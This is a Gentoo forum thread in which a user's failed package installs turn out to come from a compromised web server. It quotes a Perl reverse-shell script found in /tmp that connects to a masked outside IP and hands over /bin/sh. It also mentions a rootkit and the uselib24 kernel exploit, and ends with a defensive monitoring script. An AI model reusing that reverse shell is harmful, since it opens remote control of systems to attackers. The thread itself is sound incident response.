| View previous topic :: View next topic |
| Author |
Message |
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
 Posted: Thu Apr 14, 2005 10:22 am Post subject: Portage: Failed to move ... [solved, compromised box] |
 |
|
I have a problem, every time I try to emerge something this happends:
| Code: |
sbin/ipmaddr
sbin/iptunnel
sbin/mii-tool
bin/hostname
bin/netstat
usr/sbin/ether-wake
>>> Completed installing net-tools-1.60-r11 into /var/tmp/portage/net-tools-1.60-r11/image/
>>> Merging sys-apps/net-tools-1.60-r11 to /
-- /sbin/
>>> /sbin/arp
!!! Failed to move /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig to /sbin/ifconfig
!!! [Errno 1] Operation not permitted
|
This was with net-tools, but it also happends with coreutils.
I've managed to emerge portage, but that didn't solve it.
Is this a known problem? Can someone help me?
_________________
Don't mess with the Penguin.
Last edited by cato` on Thu Apr 14, 2005 12:34 pm; edited 1 time in total |
|
| Back to top |
|
 |
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
| Posted: Thu Apr 14, 2005 10:48 am Post subject: |
|
|
| is /var/tmp/portage (or /var, /var/tmp) a symlink by any chance? if so, that doesnt work. |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 10:59 am Post subject: |
|
|
| hds wrote: | | is /var/tmp/portage (or /var, /var/tmp) a symlink by any chance? if so, that doesnt work. |
No, it is not. I even deleted /var/tmp/portage, but the same error occurs.
The thing I don't understand is why some packages get installed (portage) and some does not.
I'm using portage-2.0.51.19 BTW.
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 11:40 am Post subject: |
|
|
Thats the exact same problem I have, except automake works fine and my .m4 works.
emerge metadata does not solve it.
dmesg does not show any problems with my harddrives.
Checking for bad blocks will take some time ...
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
| Posted: Thu Apr 14, 2005 11:49 am Post subject: |
|
|
btw.. you do this as root? it could be really a permission problem if you do this as a user.. even if you are in group portage.
hmm.. OTOH portage itself wouldnt install either then..  |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 11:59 am Post subject: |
|
|
I do this as root.
| Code: | # badblocks -v /dev/hda
Checking blocks 0 to 8257032
Checking for bad blocks (read-only test): done
Pass completed, 0 bad blocks found. |
So I'm kinda lost ... I'll post a bug raport later today if someone/I can't figure out the problem.
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
| Posted: Thu Apr 14, 2005 12:16 pm Post subject: |
|
|
well, just checked.. using the same version of portage as you are, and everything works fine here.
really strange..
put a test file to /var/tmp/portage, and mv it from he commandline to /sbin.. does that work?
or simply do "mv /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig to /sbin/ifconfig"
if you still have the tempfiles. |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 12:21 pm Post subject: |
|
|
| hds wrote: | well, just checked.. using the same version of portage as you are, and everything works fine here.
really strange..
put a test file to /var/tmp/portage, and mv it from he commandline to /sbin.. does that work?
or simply do "mv /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig to /sbin/ifconfig"
if you still have the tempfiles. |
We found something ...
| Code: |
portage # mv /var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig /sbin/ifconfig
mv: overwrite `/sbin/ifconfig', overriding mode 0755? y
mv: cannot move `/var/tmp/portage/net-tools-1.60-r11/image/sbin/ifconfig' to `/sbin/ifconfig': Operation not permitted
|
But what does that mean?
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 12:24 pm Post subject: |
|
|
ok ... ran chkrootkit and it says ...
| Code: |
Checking `ifconfig'... INFECTED
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not infected
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... not infected
Checking `login'... INFECTED
|
Guess thats the problem  [/quote]
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
| Posted: Thu Apr 14, 2005 12:27 pm Post subject: |
|
|
sh*t 
if you figure out, please post what infected your system.. |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 12:46 pm Post subject: |
|
|
its a romanian rootkit installed. In /tmp i have a file called "vechi" a files called "brk" and a file called w00t by the apache user.
the w00t file: | Code: | tmp # cat w00t
#!/usr/bin/perl
use Socket; use IO::Handle; use POSIX; $proto = getprotobyname('tcp'); socket(Socket_Handle, AF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in(50 ,inet_aton("XXX.XXX.XXX.XXX" )); connect(Socket_Handle,$sin); dup2(Socket_Handle->fileno, 0); dup2(Socket_Handle->fileno, 1); dup2(Socket_Handle->fileno, 2); exec { "/bin/sh" } ""; |
(edited my IP away)
chrootkit says I have ShKit rootkit installed and Checking `lkm'... You have 4 process hidden for ps command, Possible LKM Trojan installed.
My apache user runs something called "uselib24" thats a kernel 2.4 exploit. The kernel on the machine is 2.4.28.
My root user also runs something I dunno what is
root 1130 0.0 0.0 0 0 ? SW Mar30 0:00 [msp3410 [auto]]
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
| Posted: Thu Apr 14, 2005 1:00 pm Post subject: |
|
|
| i wonder how this stuff got installed.. is this a webserver? |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 1:02 pm Post subject: |
|
|
okay, the last is something coldplug fires up on boot for the bttv card.
the w00t file launches a shell on port 50.
A koeran ip (218.48.78.XXX) is connected to the box.
Guess it's going down now. Damn script-kiddies.
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 1:03 pm Post subject: |
|
|
| hds wrote: | | i wonder how this stuff got installed.. is this a webserver? |
Yes. My guess is that this is/was a PHP vulnability.
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
| Posted: Thu Apr 14, 2005 1:15 pm Post subject: |
|
|
| cato` wrote: |
A koeran ip (218.48.78.XXX) is connected to the box.
|
probably this system is compromised as well.. do a whois lookup. if its a static IP (no provider or whatever) i would write an email to the webmaster.
OTOH, it could also be just a windows client 
//edit: anyway, just wondering why you couldnt simply overwrite /sbin/ifconfig.
did the file have special permissions??
just curious.. root should be able to overwrite any file, i thought
btw2: i have esync, glsa-check and chkrootkit running every morning on my rootserver, and the results will be posted to me via email. perhaps you should do the same..
btw3: would be nice if a mod could move this to "network & security".. |
|
| Back to top |
|
|
cato`
Guru
Joined: 03 Jun 2002
Posts: 430
Location: Norway, Trondheim
|
| Posted: Thu Apr 14, 2005 1:41 pm Post subject: |
|
|
Could you tell how to set up the glsa-check and how you mail the results to yourself ?
_________________
Don't mess with the Penguin. |
|
| Back to top |
|
|
Maedhros
Bodhisattva
Joined: 14 Apr 2004
Posts: 5511
Location: Durham, UK
|
| Posted: Thu Apr 14, 2005 1:44 pm Post subject: |
|
|
Moved from Portage & Programming.
_________________
No-one's more important than the earthworm. |
|
| Back to top |
|
|
hds
Advocate
Joined: 21 Aug 2004
Posts: 2629
Location: Sprockhoevel [GER]
|
| Posted: Thu Apr 14, 2005 1:51 pm Post subject: |
|
|
| cato` wrote: | | Could you tell how to set up the glsa-check and how you mail the results to yourself ? |
emerge gentoolkit
emerge sendEmail
bashscript:
| Code: |
date >/root/status.txt
echo "-------------------------------">>/root/status.txt
esync -n -s >>/root/status.txt
echo "-------------------------------">>/root/status.txt
glsa-check -t all >>/root/status.txt
echo "-------------------------------">>/root/status.txt
chkrootkit >>/root/status.txt
echo "-------------------------------">>/root/status.txt
emerge -upDv --newuse world >>/root/status.txt
echo "-------------------------------">>/root/status.txt
df /dev/hda3 >>/root/status.txt
echo "-------------------------------">>/root/status.txt
sendEmail -t root -f root -m Status_Report -u System_Status -a /root/status.txt
|
edit to your needs and put it in your crontab
HTH
//edit: if you dont use esync, simply use "emerge sync", of course.
glsa-check belongs to gentoolkit. |
|
| Back to top |
|
|
|
Networking & Security
